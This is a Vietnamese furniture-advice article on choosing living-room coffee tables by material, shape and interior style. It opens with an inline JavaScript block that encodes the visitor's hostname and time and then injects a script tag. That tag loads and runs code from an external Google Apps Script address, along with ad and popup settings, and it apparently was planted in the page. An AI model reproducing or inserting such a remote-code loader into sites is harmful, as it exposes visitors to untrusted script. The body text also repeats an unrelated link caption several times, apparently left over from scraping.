var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách chọn mẫu bàn trà phòng khách đẹp cho từng không gian

Chọn bàn trà phòng khách đẹp không quá khó khăn như chúng ta vẫn tưởng tượng. Chỉ cần nắm được 3 yếu tố dưới đây, bạn có thể mua sắm mẫu bàn trà phòng khách phù hợp theo từng nhu cầu và mong muốn của gia đình.

1. Chọn bàn trà phòng khách đẹp theo chất liệu

Chất liệu bàn trà là yếu tố quan trọng quyết định đến thẩm mỹ, công năng sử dụng cũng như giá cả đắt hay rẻ. Hiện nay, bàn trà phòng khách đẹp được sản xuất phổ biến với các chất liệu gồm: gỗ tự nhiên, gỗ công nghiệp, bàn trà chân sắt – thiết kế mặt gỗ, mặt đá hoặc mặt kính. Trong đó, chất liệu bàn trà gỗ vẫn là gợi ý lựa chọn phổ biến nhất với nhiều thiết kế đa dạng về mẫu mã, phong cách.

Ngoài ra còn có chất liệu bàn trà kim loại kết hợp giữa khung inox mặt đá cẩm thạch hoặc mặt kính tạo nên không gian nội thất độc đáo, tinh tế. Tùy theo nhu cầu sử dụng bạn có thể lựa chọn chất liệu bàn trà phù hợp trong đó, bàn trà từ gỗ tự nhiên và bàn trà kim loại vấn có mức giá đắt nhất; ở phân khúc giá rẻ bạn có thể chọn bàn trà phòng khách đẹp chất liệu gỗ công nghiệp với giá từ 3 triệu đồng đến 5,5 triệu đồng.

20+ Mẫu bàn ăn gia đình 6 ghế đẹp, mới nhất 2021 nên sắm ngay
Thiết kế mẫu bàn trà độc đáo và sang trọng – bàn trà mặt đá khung inox tròn đôi xu hướng mới hiện nay

2. Chọn bàn trà phòng khách đẹp theo từng kiểu dáng

Các kiểu dáng bàn trà phòng khách đẹp hiện nay phổ biến gồm: bàn trà tròn, bàn trà vuông, bàn trà hình chữ nhật và bàn trà hình oval… Tùy theo từng không gian nội thất khác nhau để bạn có thể lựa chọn.

– Đối với bàn trà tròn, bàn trà hìn vuông và bàn trà hình oval: tạo cảm giác gần gũi, tiết kiệm diện tích không gian thường đặt trong phòng khách vừa và nhỏ.

– Bàn trà hình chữ nhật: gợi ý phổ biến nhất hiện nay có thể đặt trong mọi diện tích không gian, tạo cảm giác hiện đại, tiện nghi.

Khi mua sắm, lựa chọn kiểu dáng bàn trà hãy chú ý bộ sofa bạn đặt cùng là sofa da, sofa vải nỉ hay sofa gỗ. Đồng thời chọn mẫu mã hài hòa với thiết kế sofa để đảm bảo công năng sử dụng cũng như thẩm mỹ tối ưu nhất.

20+ Mẫu bàn ăn gia đình 6 ghế đẹp, mới nhất 2021 nên sắm ngay
Mẫu bàn trà phòng khách đẹp hình chữ nhật là gợi ý được yêu thích nhất hiện nay

3. Chọn bàn trà phòng khách đẹp theo từng phong cách thiết kế nội thất

Mỗi phong cách thiết kế nội thất gia đình khác nhau sẽ có cách chọn bàn trà khác nhau. Những không gian cổ điển thường sẽ kết hợp đồng bộ giữa bàn trà và sofa cổ điển để tạo sự hài hòa, sang trọng và đẳng cấp cho không gian.

Đối với những không gian nội thất hiện đại, chọn mẫu bàn trà phòng khách đẹp sẽ dễ dàng hơn khi tìm kiếm kiểu dáng hiện đại, đẹp mắt đảm bảo kết hợp ăn ý với các mẫu sofa đẹp làm sao cho phù hợp là được.

20+ Mẫu bàn ăn gia đình 6 ghế đẹp, mới nhất 2021 nên sắm ngay
Các cách chọn bàn trà phòng khách hiện nay có rất nhiều, bạn cũng nên chú ý đến phong cách nội thất tổng thể không gian
20+ Mẫu bàn ăn gia đình 6 ghế đẹp, mới nhất 2021 nên sắm ngay
Mẫu bàn trà phòng khách đẹp đặt hài hòa trong không gian sống, tôn lên vẻ đẹp sang trọng đẳng cấp

Trên đây là các cách chọn mẫu bàn trà phòng khách đẹp đảm bảo thẩm mỹ và công năng sử dụng tốt nhất cho ngôi nhà. Nếu bạn đang có ý định mua sắm bàn trà hãy tham khảo ngay nhé, chắc chắn bạn sẽ có được những tham khảo bổ ích.